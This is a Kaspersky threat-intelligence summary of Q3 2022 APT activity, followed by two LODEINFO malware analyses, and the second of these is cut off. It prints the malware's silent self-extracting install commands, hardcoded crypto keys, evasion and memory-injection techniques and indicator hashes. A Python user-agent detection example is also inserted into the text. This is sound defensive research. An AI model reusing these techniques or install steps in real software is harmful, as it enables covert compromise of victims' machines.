For more than five years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research; and they provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q3 2022.

Readers who would like to learn more about our intelligence reports or request more information on a specific report, are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

On July 7, CISA issued an alert, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector“, based on a Stairwell report about Maui ransomware. We can confirm a Maui ransomware incident in 2022, but we would expand their “first seen” date from the reported May 2021 to April 15, 2021, and the geolocation of the target to Japan and India. Since the malware in this incident was compiled on April 15, 2021, and compilation dates are the same for all known samples, this incident is likely to be the first involving Maui ransomware. No useful information is provided in the CISA report attributing the ransomware to a North Korean actor, but we found that approximately 10 hours prior to deploying Maui to the system the group also deployed a variant of DTrack to the system. This and other data points should help solidify attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly) with low-to-medium confidence. You can read our public report on Andariel’s use of DTrack and Maui here.

DTrack is a backdoor used by subsets of the Lazarus group. The backdoor has been used in a variety of attacks, including ransomware attacks and espionage campaigns. We have reported it several times in the past and also more recently, as it plays an important role in Lazarus’s activity. In March, we detected new DTrack samples packed in a different way and with relatively few changes in the code. In our report that will be published in November, we will analyze this latest set of samples in detail, describing the changes and the packing mechanisms. We will also highlight new victimology, including various targets across Europe.

Russian-speaking activity

We first documented the threat actor HotCousin in 2021 as a cluster of malicious activities leveraging the EnvyScout implant, publicly attributed to Dark Halo (NOBELIUM) by Microsoft. Our recent investigations show that this year, from February at least, HotCousin has attempted to compromise foreign affairs ministries in Europe, Asia, Africa and South America. The group’s TTPs remained consistent with those we described before. The victims are targeted with spear-phishing emails that trick them into mounting a malicious ISO file and double-clicking an LNK, which starts the infection chain. The first infection usually aims to install a downloader, which attempts to download other malicious implants from legitimate web services. The final payload is typically a commercially available implant such as Cobalt Strike. Some of these activities were also observed by other vendors, notably with descriptions of downloaders that obtain additional implants from external services such as Dropbox, Google Drive and Trello. In most cases, the targets appear to be diplomatic and government organizations in Europe. We are still unable to identify any significant link between HotCousin and Dark Halo/NOBELIUM or The Dukes/APT29; but the targets, techniques and tradecraft all coincide with activities that are publicly described as APT29.

Chinese-speaking activity

At the beginning of 2021, Kaspersky published a private report about the A41APT campaign. This report included technical details of malware used in the campaign, such as Ecipekac, SodaMaster, P8RAT, FYAnti and QuasarRAT. Together with our research partners, we observed the activities of the A41APT campaign throughout 2021 and presented this research at the Japan Security Analyst Conference 2022 (“What We Can Do against the Chaotic A41APT Campaign”). In December 2021, Trend Micro also published a blogpost about their investigation into the latest activities of the threat actor behind the A41APT campaign, which they named Earth Tengshe. Trend Micro believes that this campaign has strong connections to the APT10 threat actor. Their blogpost also introduced new malware, dubbed Jackpot – previously unknown fileless malware targeting IIS servers. Our research findings overlapped with Trend Micro’s on some of the new TTPs, such as updated versions of SodaMaster and Ecipekac and a new malicious fileless IIS module dubbed IISBack. However, we also discovered a new malicious implant that has been used by this actor to deploy SodaMaster since 2015: we named this module HUI loader. Our research also revealed the evolution of some of the malware implants used by this threat actor over the years, such as Ecipekac and SodaMaster.

Since April, we have detected a number of KeyPlug malware samples being deployed in the systems of high-profile victims in Asian countries, with some traces going back to late 2021. KeyPlug is a modular backdoor with the capability of communicating to its server via several network communication protocols set in its XOR-encrypted embedded configuration block. The server infrastructure is mostly based on Cloudflare CDN, with each of the malware samples we have collected containing only one domain and several IP addresses that all point to the same domain on the CDN network. Once connected to the server, the malware downloads further modules as plugins and loads them on the victim’s machine. The malware and the infrastructure used in these attacks have similarities with previously known APT41 activities. However, these attacks can only be attributed to APT41 with medium confidence; and it is also possible that another threat actor is behind the attacks.

We recently analyzed the targeting of online gambling platform development studios and IT recruitment organizations by DiceyF, using the GamePlayerFramework. This is related to older PuppetLoader code, but has been re-designed and re-written in C#. DiceyF steals code-signing certificates to digitally sign malware, embeds artefacts and strings within its malware mimicking the legitimate software signed with these certificates, and then distributes the signed malware via software distribution servers. Most targets were in Hong Kong and the Philippines, but there were also some in China and Vietnam.

In March, we observed the use of a Microsoft Word file as the infection vector in some attacks. In June, we found an SFX file using a decoy file containing Japanese content. We also discovered a new downloader shellcode that we dubbed DOWNIISSA, used to deploy the LODEINFO backdoor. While the targets are Japanese and consistent with the usual victimology of APT10, we also found hints of possible operations in Russia and Malaysia. Furthermore, we investigated new versions of LODEINFO shellcode, namely v0.5.9, v0.6.2, v0.6.3 and v0.6.5, in March, April and May respectively. These findings show that APT10, which appeared to be inactive for some time, has resumed its activities with the new version of LODEINFO.

In April, our product detected CobaltStrike loaders in a diplomatic organization in APAC that has been targeted by several APT actors in the past. The loaders caught our attention because one of them displayed a legitimate digital signature from a software development company, whom we alerted to the incident. Digging deeper, we found several variants leveraging either HTTP or raw TCP communication protocols and discovered traces of post-exploitation activities related to them, as well as simultaneous use of Radmin and Gh0stRAT. Natural language artefacts and weak TTPs indicate that this attack may be attributed to Chinese-speaking attackers, but we were unable to tie this activity to any existing group. In fact, we couldn’t find any other use of the droppers presented in our report beyond this incident.

Middle East

We recently discovered and analyzed FramedGolf, a previously undocumented IIS backdoor that could only be found in Iran and which was designed to establish a persistent foothold in targeted organizations. Notably, the backdoor has been deployed after successful exploitation of ProxyLogon-type vulnerabilities on Exchange servers. The malware has been used to compromise at least a dozen organizations, starting in April 2021 at the latest, with most still compromised in late June 2022.

SoleDragon is complex malware used by the SilentBreak threat group. Kaspersky first discovered this malware in 2018, together with the CVE-2018-8453 vulnerability. In 2019, SoleDragon was also deployed through Skype. After that, there was no information about SoleDragon until we detected two new implants at the end of 2021. The implants, which targeted organizations in the Middle East, share code similarities with older SoleDragon samples. One of the newly discovered implants is a C++ backdoor, SoleExecutor, that waits for an activation message, then receives a DLL and launches it; the other implant is a keylogger we dubbed Powerpol.

In June, we identified a previously unknown Android spyware app that targets Persian-speaking individuals. SandStrike is distributed as a means to access resources about the Baháʼí religion that are banned in Iran. It provides victims with a VPN connection that can be used to browse these resources. The spyware itself collects various data from the victims’ devices, such as call logs or lists of contacts. During execution, it connects to the C2 server to request commands: these commands allow attackers to perform operations with the device file system.

DeftTorero (aka Lebanese Cedar, Volatile Cedar) is an APT actor that probably originates from the Middle East and is known to focus on victims in the same region. While its activities have been observed since 2012, its presence was only revealed in 2015 (Kaspersky was among the first to report it) and no public activity was recorded until January 2021. The public reports available to date expose and discuss the final payload – Explosive RAT – and the web shells used in the initial foothold, with little on TTPs. Our report focuses much more on the TTPs used by the threat actor in intrusions between late 2019 and mid-2021. Based on our telemetry, the January 2021 indicators do not necessarily represent new intrusions or new malware samples, as the detections were relatively old (between 2018 and 2020), and the Explosive RAT samples did not contain significant modifications. Analyzing previous intrusions, we suspect the gap in new detections is due to the fact that the threat actors were (and possibly still are) using fileless techniques and public offensive tools used by many threat actors, such as Metasploit, Mimikatz, Crackmapexec, known web shells, and other known tools. This gives the operators a level of anonymity in compromising their targets and victims.

Southeast Asia and Korean Peninsula

We observed a rise in the use of the DeathNote cluster recently. In March, we saw Lazarus use it against victims in South Korea. The actor possibly used a strategic web compromise, employing an infection chain similar to that which we previously reported, abusing an endpoint security program. However, we discovered that the malware and infection schemes have been updated. The attacker used a multi-stage infection, starting with the Racket Downloader. Through Racket Downloader, the operator deployed additional malware for further post-exploitation activity. In this phase, the actor used malware that we hadn’t seen before, with minimal functionality to execute commands from the C2 server. Using this implanted backdoor, the operator conducted many hands-on keyboard activities. They lurked in this victim’s environment for a month and executed various commands to collect basic system information. Also, we observed how they attempted to find valuable hosts with high privileges, such as file servers or Active Directory servers. Lazarus Group delivered additional malware such as a keylogger and password-dumping tool to collect more information. Moreover, as a result of working closely with KrCERT, we had a chance to look into the adversary’s C2 scripts. They employed a similar C2 structure as before, compromising a web server and configuring a multi-stage C2 server, with the first stage server acting as a proxy server and the second stage server used for controlling victims.

We uncovered an ongoing campaign targeting defense contractors in South Africa and Brazil. The threat actor behind the attacks contacted potential victims via social media or email and sent the initial malware through Skype. The malware is a Trojanized PDF application that initiates a multi-stage infection chain, loading additional payloads with C2 communication capability via the DLL sideloading technique. The threat actor then deployed further malware to the initial host to pivot and perform lateral movement. In this process, the operator took advantage of a relatively new DLL sideloading technique named ServiceMove. This technique was introduced by a red team researcher and abuses the Windows Perception Simulation Service to load arbitrary DLL files for malicious purposes. This notorious threat actor operates several clusters and attacks various targets based on its intentions. In one of the victims, we observed a similar initial infection vector, but the actor used different malware. Lazarus Group is equipped with various tools and employs them with various infection chains. While examining all the samples in this case, we observed different clusters: ThreatNeedle, Bookcode, and DeathNote.

For over a decade, the Tropic Trooper APT actor has been actively targeting victims in East and Southeast Asia. We have been tracking this threat actor for several years and previously published an APT threat report describing its malicious operations. Earlier this year, Symantec published a report describing a campaign called Antlion, which has been observed targeting financial institutions in Taiwan. While analyzing the IoCs of this campaign, we found strong connections with the Tropic Trooper threat actor, leading us to conclude that this group is behind the Antlion campaign. In our investigation, we discovered and studied different attacks conducted by this threat actor using the malware families described in Symantec’s blog post, together with new versions of the malware we reported in one of our reports on Tropic Trooper a few years ago. We managed to uncover the infection chain for these attacks, the attack infrastructure, lateral movement and post-exploitation activities carried out by this actor. Besides the finance sector, additional target verticals include the tech hardware and semiconductors industry, as well as a political entity. Furthermore, we discovered a previously unknown, multi-module backdoor deployed to a victim machine in August 2021 that uses the MQTT protocol for network communication with its C2 server. Tracing the history of this backdoor, it appears the module has been used by this threat actor since at least 2019 and only with a select set of targets.

Kimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group also updates its tools frequently. Recently, however, we had a chance to take a thorough look at how they configure their C2 servers and what kind of tricks they use to confirm and further validate their victims. The Kimsuky group configured multi-stage C2 servers with various commercial hosting services located around the world. We believe the attacks occur in several stages. First, the actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first stage C2 server, with an email address as a parameter. The first stage C2 server verifies that the incoming email address parameter is an expected one and delivers the malicious document if it’s in the target list. The first stage script also forwards the victim’s IP address to the next stage server. When the fetched document is opened, it connects to the second C2 server. The corresponding script on the second C2 server checks the IP address forwarded from the first stage server, to verify that it’s an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks operating system type and predefined user-agent strings, to filter out requests from security researchers or auto-analysis systems. Our research underlines how the Kimsuky threat actor pays close attention to validating legitimate victims and delivering the next stage payloads to them.

Following our analysis report on Dropping Elephant’s activities last year, we continued to track this threat actor’s activities. The group has remained very active over the past year: we investigated numerous attacks against military, diplomatic and educational institutions in Pakistan and China. From analysis of the samples we collected, it’s clear that Dropping Elephant did not discard its traditional JakyllHyde RAT (aka BadNews), but in recent attacks we have seen a shift towards using PubFantacy, and we’ve even seen some features of JakyllHyde ported to PubFantacy. At the same time, we also found new malware developed using Delphi. Dropping Elephant’s main attack methods are still phishing and attacking vulnerable Office suites. Where CVE-2017-0261 was used before, CVE-2017-11228 replaces it.

Other interesting discoveries

On July 30, an actor going by the name Adastrea posted a message on two dark web forums that they were selling 60GB of confidential and restricted information belonging to MBDA, NATO, and the Italian Ministry of Defense. Adastrea is a brand-new account and defines itself as an independent group of specialists and researchers in cybersecurity. In another post on August 10, the actor offered 500MB of military intelligence data reportedly stolen from the Philippines. We weren’t able to acquire and analyze that leak. In its post from July, the threat actor also shared demo files hosted on MEGA (only 47MB), and wrote that they would discuss prices for the leak in a private chat, sharing their XMPP account and a Protonmail email address. Following these statements, MBDA denied any compromise in a press release. A week later, on August 7, the threat actor posted new evidence of exfiltrated data. Kaspersky ICS-CERT was able to obtain parts of the private exfiltrated data, which was analyzed with the help of the Kaspersky Global Research and Analysis Team to better understand the TTPs and veracity of the forum posts made by the threat actor.

We discovered a previously unknown backdoor in active use since at least December 2020. This backdoor’s primary purpose is to log and exfiltrate passwords, matching the functionality of the Security Support Provider (SSP) DLL it leverages. Along with the gathered passwords, the backdoor collects typical information about the infected system and provides the attacker with several commands to manipulate and execute files. This backdoor comprises an encrypted shellcode that allows the attacker to execute arbitrary code received over an encrypted channel. We have found a very limited set of victims in Japan and Ethiopia, and no ties to previously known malware families or threat actors.

In September, we published our analysis of Metatron, a new and very sophisticated malware platform that has been used to target telecoms companies, ISPs and universities in the Middle East and Africa. Metatron is a modular implant boot-strapped through a Microsoft Console Debugger script. The backdoor supports multiple transport modes and offers forwarding and port knocking features: it implements 67 different commands. The original samples were provided by SentinelOne and analysed in collaboration with them.

Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual’s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we’ve seen in Q3 2022:

  • APT campaigns are very widely spread geographically. This quarter, we have seen actors expand their attacks into Europe, the US, Korea, Brazil, the Middle East and various parts of Asia.
  • The targets chosen by APT threat actors are equally diverse. They include government and diplomatic bodies, defense contractors, the finance sector, the tech hardware and semiconductors sector and IT recruitment and gambling sectors.
  • Geopolitics remains a key driver of APT development and cyber-espionage continues to be a prime aim of APT campaigns. However, the use of ransomware by Andariel illustrates that this isn’t the only motive for APT attacks.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or “other”-speaking languages, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.

APT10: Tracking down LODEINFO 2022, part II

31 October, 2022 - 09:00

In the previous publication ‘Tracking down LODEINFO 2022, part I’, we mentioned that the initial infection methods vary in different attack scenarios and that the LODEINFO shellcode was regularly updated for use with each infection vector. In this article, we discuss improvements made to the LODEINFO backdoor shellcode in 2022.

Kaspersky investigated new versions of the LODEINFO shellcode, namely v0.5.9, v0.6.2, v0.6.3 and v0.6.5, in March, April and June 2022. The following chart shows the evolution timeline of this malware since its discovery.

Timeline of LODEINFO releases

LODEINFO v0.5.6: multiple encryption for C2 communication with ancient crypto algorithm

This LODEINFO v0.5.6 shellcode extracted from a loader module demonstrates several enhanced evasion techniques for certain security products, as well as three new backdoor commands implemented by the developer.

After infecting the target machine, the LODEINFO backdoor beacons out machine information to the C2, such as current time, ANSI code page (ACP) identifier, MAC address and hostname. The beacon also contains a hardcoded key (NV4HDOeOVyL) used later by the age-old Vigenere cipher. Furthermore, randomly generated junk data is appended to the end of the data, possibly to evade beaconing detection based on packet size.

Vigenere cipher key and randomly generated junk data added in LODEINFO v0.5.6

In December 2021, we discovered LODEINFO v0.5.8, with a slight modification that added the LODEINFO implant version number right after the Vigenere cipher key.

The encryption function used to send data was also modified, making it even more complicated. As in previous variants, it takes the first 48 bytes of the SHA512 hash of the data to be sent, XORs them with a four-byte key equal to the elapsed running time, and prepends the result to the data. The first 16 bytes to be sent come from another SHA512 hash, this time calculated from the previously mentioned hardcoded AES key (NV4HDOeOVyL). It encrypts the last 11 bytes of the base64-encoded payload (url-safe, with the “=” padding replaced by “.”) to dynamically generate the second Vigenere cipher key; these bytes also form the first field of the final packet. The second key is used by the Vigenere cipher to encrypt the base64-encoded header (url-safe, with the “=” padding replaced by “.”).

Crypto algorithms and data flow in C2 communications

Finally, the data to be sent to the C2 is produced using the second key, the encrypted header, and the payload through the complex steps described above. The final data packet structure is as follows:

Offset | Description | Crypto algorithm
0x00 | 11 bytes from the end of the payload | Vigenere cipher
0x0C | A delimiter | N/A
0x0D | Message header (structure below) | base64 (url-safe, padding “=” replaced by “.”), then Vigenere cipher
0x29 | Message payload (structure below) | base64 (url-safe, padding “=” replaced by “.”)

Message header:

Offset | Description
0x00 | The first 16 bytes of the SHA512 value calculated from the hardcoded AES key.
0x10 | Size of the base64-encoded payload
0x15 | A byte of unknown data

Message payload:

Offset | Description
0x00 | The first 48 bytes of the SHA512 value calculated from the AES-encrypted data that follows (offset 0x36), XORed with a key equal to the elapsed running time.
0x30 | XORed size of the encrypted data
0x35 | One-byte XOR key for the size field at offset 0x30
0x36 | Data encrypted with AES in CBC mode using the hardcoded AES key “88 8C A3 F2 87 36 CC 12 A5 90 18 56 13 B7 C0 A7 E1 07 D4 5C 7D 47 37 AD AB A3 8C C2 12 E3 03 AC” and IV “83 01 36 C9 3A 2D 13 29 23 56 78 A1 F1 0C D1 75”. The data contains the elapsed running time, current time, ANSI code page, MAC address, host name, etc.

LODEINFO v0.5.6: 2-byte XOR obfuscation for backdoor command identifiers

This update included revised crypto algorithms and backdoor command identifiers that were defined as four-byte hardcoded values in previous LODEINFO shellcodes. LODEINFO v0.5.6 backdoor command identifiers are obfuscated with a two-byte XOR operation. Before comparing a command identifier, an XOR operation is applied for each command. The hardcoded XOR key differs for each command as follows:

Two-byte XOR for four-byte stack strings of backdoor command identifiers

We also observed the actor implementing new backdoor commands such as “comc”, “autorun”, and “config” in LODEINFO v0.5.6 and later versions. Twenty-one backdoor commands, including three new commands, are embedded in the LODEINFO backdoor to control the victim host.

LODEINFO v0.5.9: hashing algorithm to get API functions

Version 0.5.9 uses a new hash calculation algorithm compared to v0.5.8. The malware uses this hashing algorithm to calculate hashes of API function names in order to resolve the function addresses. It appears to be a custom algorithm developed by the actor. The hash calculation ends with an XOR operation against a hardcoded two-byte key, which differs in each sample.

Changed hash calculation algorithm and additional two-byte XOR key in v0.5.9

This modification suggests the attacker’s goal was to evade signature-based detections and make the reverse engineering process more difficult for security researchers.

LODEINFO v0.6.2: evasion of en_US environment

In LODEINFO v0.6.2 and later versions, the shellcode has a new feature that looks for the “en_US” locale on the victim’s machine in a recursive function and halts execution if that locale is found.

Recursive call if the “en-US” locale is found

According to our own investigations, as well as open-source intelligence collected on this malware, the main targets of these attacks are Japanese entities. The aim of this feature, therefore, is to evade execution in sandboxes and on researcher machines, something that occurs most commonly in an English-language locale.

LODEINFO v0.6.2: generating user agent for C2 communications

The function responsible for generating the user agent for C2 communication has also been updated from v0.6.2. The malware generates the user agent string using the following hardcoded formatted string, where the %s is substituted with the version number of the installed chrome.exe application:

“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/%s Safari/537.36”.

The malware gets the version number of the installed chrome.exe from the EXE file present at one of the following file paths:

  • C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
  • C:\Program Files\Google\Chrome\Application\chrome.exe
  • C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe

Otherwise, if none of these files exists on the system, the malware uses the hardcoded version 98.0.4758.102 to create the following user agent string:

  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
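The user-agent logic above gives a defender something concrete to look for: the implant only ever sends the hardcoded Chrome/98.0.4758.102 string when none of the three chrome.exe paths exists. The following Python is an added example, not code from the report, that rebuilds the LODEINFO user agent for a host and scans proxy log lines (constructed, tab-separated host/request/UA layout assumed) against a software inventory to flag hosts whose reported Chrome version does not fit what is installed.

```python
import re

# Values quoted in the report (not assumptions): the v0.6.2 user-agent
# template and the Chrome version used when no chrome.exe is found.
LODEINFO_UA_TEMPLATE = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/%s Safari/537.36"
)
FALLBACK_CHROME_VERSION = "98.0.4758.102"

# Matches the exact template shape and captures the Chrome version.
LODEINFO_UA_RE = re.compile(
    r"^Mozilla/5\.0 \(Windows NT 10\.0; Win64; x64\) AppleWebKit/537\.36 "
    r"\(KHTML, like Gecko\) Chrome/(\d+\.\d+\.\d+\.\d+) Safari/537\.36$"
)


def build_lodeinfo_ua(installed_version):
    """Reproduce the user agent the implant would send from a given host."""
    return LODEINFO_UA_TEMPLATE % (installed_version or FALLBACK_CHROME_VERSION)


def parse_proxy_line(line):
    """Constructed log layout (assumption): host, request and UA separated by tabs."""
    host, request, ua = line.rstrip("\n").split("\t", 2)
    return host, request, ua


def lodeinfo_ua_alerts(log_lines, installed_chrome):
    """
    installed_chrome maps hostname -> Chrome version found by software
    inventory, or None when Chrome is not installed on that host.
    Returns a list of (host, reason) tuples.
    """
    alerts = []
    for line in log_lines:
        host, _request, ua = parse_proxy_line(line)
        m = LODEINFO_UA_RE.match(ua)
        if not m:
            continue  # other browsers and tools are out of scope here
        ua_version = m.group(1)
        real_version = installed_chrome.get(host)
        if ua_version == FALLBACK_CHROME_VERSION and real_version != FALLBACK_CHROME_VERSION:
            # The implant only sends 98.0.4758.102 when none of the three
            # chrome.exe paths exists; a host whose inventory disagrees is suspect.
            alerts.append((host, "fallback Chrome version %s sent, inventory has %s"
                           % (ua_version, real_version)))
        elif real_version is not None and ua_version != real_version:
            # Weaker signal: the implant copies the installed version, so a real
            # Chrome and the implant look alike; a mismatch still deserves a look.
            alerts.append((host, "UA Chrome %s differs from installed %s"
                           % (ua_version, real_version)))
    return alerts


# Constructed sample data for a stand-alone run.
SAMPLE_INVENTORY = {
    "ws01": None,              # no Chrome at all
    "ws02": "105.0.5195.102",  # current Chrome, UA matches
    "ws03": "98.0.4758.102",   # genuinely still on the fallback version
    "ws04": "104.0.5112.81",   # UA claims the fallback version
    "ws05": "104.0.5112.81",   # UA claims an unrelated version
}
SAMPLE_LOG = [
    "ws01\tGET http://example.com/\t" + build_lodeinfo_ua(None),
    "ws02\tGET http://example.com/\t" + build_lodeinfo_ua("105.0.5195.102"),
    "ws03\tGET http://example.com/\t" + build_lodeinfo_ua(None),
    "ws04\tGET http://example.com/\t" + build_lodeinfo_ua(None),
    "ws05\tGET http://example.com/\t" + build_lodeinfo_ua("103.0.5060.134"),
    "ws06\tGET http://example.com/\tcurl/7.68.0",
]

if __name__ == "__main__":
    for host, reason in lodeinfo_ua_alerts(SAMPLE_LOG, SAMPLE_INVENTORY):
        print(host, reason)
```

When Chrome is present in one of the three listed paths the implant's user agent is identical to the real browser's, so this check is only meaningful on hosts where the inventory and the reported version disagree.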

LODEINFO v0.6.2: supporting the injection of the 64-bit shellcode in ‘memory’ command

Based on our deep analysis of this version, we discovered a very interesting update in the shellcode loading scheme implemented from version v0.6.2, in the function that handles the ‘memory’ command.

Checking the OS architecture and the next shellcode architecture

During the memory injection process, performed using the function responsible for the memory command, the malware checks the first byte of the second stage shellcode to determine the shellcode architecture using a magic hex value. If the first byte is 0xE9, the architecture is 32-bit, and if it is 0x8D, the architecture is 64-bit. After the check is completed, if the first byte was 0x8D, it gets replaced with 0xE9 in order for the shellcode to execute properly. In the function shown below, the malware checks the OS architecture of the infected machine and handles the appropriate loading scheme according to OS architecture and shellcode architecture.

Memory injection of the 64-bit shellcode was supported in v0.6.2

In the shellcode injection process, it uses the basic Windows APIs such as VirtualAllocEx(), WriteProcessMemory() and CreateRemoteThread() for memory injection of the 32-bit shellcode and NtAllocateVirtualMemory(), NtWriteVirtualMemory() and RtlCreateUserThread() for supporting the memory injection of the 64-bit shellcode.

LODEINFO v0.6.3: reducing backdoor commands

As for updates implemented in the LODEINFO backdoor commands, the obfuscation method using two-byte XOR encryption for backdoor command identifiers as well as the debug strings remained untouched up to version 0.5.6. However, in version 0.6.3, the actor removed some of the unnecessary backdoor commands to improve the efficiency of the backdoor. The number of backdoor commands was reduced from 21 in v0.6.2 to 11 in v0.6.3. The modifications to the C2 command list are shown in the table below.

Command | Description and updates | Implemented since version | Presence of commands in v0.6.3 – v0.6.5
command | Show embedded backdoor command list. | v0.1.2 | Available
send | Download a file from C2. | v0.1.2 | Available
recv | Upload a file to C2. | v0.1.2 | Available
memory | Inject the shellcode in memory. This command has been updated to support the 64-bit shellcode in v0.6.2 and later versions. | v0.1.2 | Available
kill | Kill a process using process ID. | v0.1.2 | Available
cd | Change directory. | v0.1.2 | Available
ver | Send malware and system information including current OS version, malware version, process ID, EXE file path, system username, current directory, C2 and Mutex name. | v0.1.2 | Available
print | Make a screenshot. | v0.3.1 | Available
ransom | Encrypt files by a generated AES key, which is also encrypted with RSA using the hardcoded RSA key. (Shows a “Not available.” message in v0.3.5.) | v0.3.8 | Available
comc | Execute command using WMI. | v0.5.6 | Available
config | Just shows a “Not available.” message from v0.5.6 until v0.6.5. | v0.5.6 | Available
ls | Get a file list. | v0.1.2 | Removed
rm | Delete a file. | v0.3.1 | Removed
mv | Move a file. | v0.4.8 | Removed
cp | Copy a file. | v0.4.8 | Removed
cat | Upload a file to C2. | v0.1.2 | Removed
mkdir | Make a directory. | v0.4.8 | Removed
keylog | Check for Japanese keyboard layout. Save keystrokes, datetime and active window name. Uses 1-byte XOR encryption and a file %temp%\%hostname%.tmp. (Shows a “Not available.” message in v0.3.5.) | v0.4.1 | Removed
ps | Show process list. | v0.4.6 | Removed
pkill | Terminate a process. | v0.4.6 | Removed
autorun | Set/delete persistence. | v0.5.6 | Removed

Conclusions

LODEINFO malware is updated very frequently and continues to actively target Japanese organizations. At the time of writing this report, in September 2022, we detected v0.6.6 and v0.6.7 with new TTPs.

One of the core modifications of the LODEINFO shellcode was support for Intel 64-bit architecture, to expand the targeted victim environments. The updated TTPs and improvements in LODEINFO and related malware, such as the implementation of the Vigenere cipher, complex infection flow with fileless malware, partial XOR encryption, C2 communication packets with a unique data structure and variable length, and password-protected documents, indicate that the attacker is particularly focused on making detection, analysis and investigation harder for security researchers.

For this reason, it becomes more and more difficult to keep track of this actor. That is why we believe it is important to emphasize collaboration within the security research community, to share our results and findings about LODEINFO and related malware attacks.

Indicators of compromise

Malicious document

da20ff8988198063b56680833c298113

LODEINFO zip implant

89bd9cf51f8e01bc3b6ec025ed5775fc

Implants that contain LODEINFO loader and a one-byte XORed shellcode

15b80c5e86b8fd08440fe1a9ca9706c9
6780d9241ad4d8de6e78d936fbf5a922

SFX file

76cdb7fe189845a0bc243969dba4e7a3
edc27b958c36b3af5ebc3f775ce0bcc7

Hardcoded C2s


APT10: Tracking down LODEINFO 2022, part I

31 October, 2022 - 09:00

Kaspersky has been tracking activities involving the LODEINFO malware family since 2019, looking for new modifications and thoroughly investigating any attacks utilizing those new variants. LODEINFO is sophisticated fileless malware first named in a blogpost from JPCERT/CC in February 2020. The malware was regularly modified and upgraded by the developers to target media, diplomatic, governmental and public sector organizations and think-tanks in Japan.

Japan is likely the main target of LODEINFO

Researchers continued tracking LODEINFO after that. JPCERT/CC and Macnica Networks shared additional updates on LODEINFO activities in a later publication. Kaspersky researchers also shared new findings during the HITCON 2021 conference, covering LODEINFO activities from 2019 to 2020, and revealing high-confidence attribution to APT10.

In March 2022, we observed a Microsoft Word file that was used as the infection vector in some attacks. In June of the same year, an SFX file was discovered targeting the Japanese government or related organizations using a decoy file with Japanese content, as well as utilizing the name of a famous Japanese politician in the filename. A new downloader shellcode named DOWNIISSA that is used to deploy the LODEINFO backdoor was also observed.

The first part of this report will provide technical analysis of the new infection methods such as SFX files and DOWNIISSA along with our findings. The second part will provide technical analysis of the LODEINFO backdoor and the related shellcode for each version of the backdoor with the latest LODEINFO IoCs and related information discovered in 2022.

Customers of Kaspersky Threat Intelligence Service have access to additional private APT reports describing past LODEINFO activities.

Initial infection #1: VBA + DLL sideloading

During our investigation of the attacks in March 2022, we observed a spear-phishing email with a malicious attachment installing malware persistence modules, which consisted of a legitimate EXE file and a malicious DLL file loaded via the DLL sideloading technique. For example, the following section describes a malicious Microsoft Word file (MD5: da20ff8988198063b56680833c298113) that was uploaded to Virustotal. Once the target opens the malicious doc file, a message in Japanese is displayed (インターネットセキュリティ設定によると、ファイルを開くために、上の黄色のドキュメントバーの「編集を有効にする」と「コンテンツの有効化」をクリックしてください。Translation: “According to your internet security settings, click “Enable Editing” and “Enable Content” on the yellow document bar above to open this file.”) to trick the victims into clicking “Enable Content” and enabling the embedded macro.

The message in Japanese to trick the target into clicking “Enable Content” and embedded VBA code

The embedded VBA code creates the folder C:\Users\Public\TMWJPA\ and drops a zip file named GFIUFR.zip (MD5: 89bd9cf51f8e01bc3b6ec025ed5775fc) in the same folder. The GFIUFR.zip contains two files named NRTOLF.exe and K7SysMn1.dll. NRTOLF.exe (MD5: 7f7d8c9c1b6735807aefb0841b78f389) is a digitally signed legitimate EXE file from the K7Security Suite software used for DLL sideloading. K7SysMn1.dll (MD5: cb2fcd4fd44a7b98af37c6542b198f8d) is a malicious DLL sideloaded by NRTOLF.exe. The malicious DLL file contains a loader of the LODEINFO shellcode. This DLL is a known loader module of LODEINFO. It contains a one-byte XOR-encrypted LODEINFO shellcode internally identified by version 0.5.9. This infection method was also used by the threat actor in the previous attacks we investigated.

Apart from this, we discovered two more implants related to LODEINFO that were used in other infection methods in 2022.

Initial infection #2: SFX + DLL sideloading

One of the implants is a self-extracting archive (SFX) file in RAR format (MD5 76cdb7fe189845a0bc243969dba4e7a3) that was also uploaded to Virustotal. Similarly, the archive contains three files named 1.docx, K7SysMn1.dll and K7SysMon.exe, with the self-extracting script commands shown below. There is also a comment added by the malware author written in Japanese that can be translated as “The following comment contains a self-extracting script command”:

Comment = ;以下のコメントは自己解凍スクリプトコマンドを含んでいます(
Path=%temp%\
Setup=%temp%\1.docx
Setup=%temp%\K7SysMon.Exe
Silent=1
Overwrite=1

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2022-06-14 03:47:04 ....A        11900         9181  1.docx
2021-08-18 18:58:58 ....A       342528       169345  K7SysMn1.dll
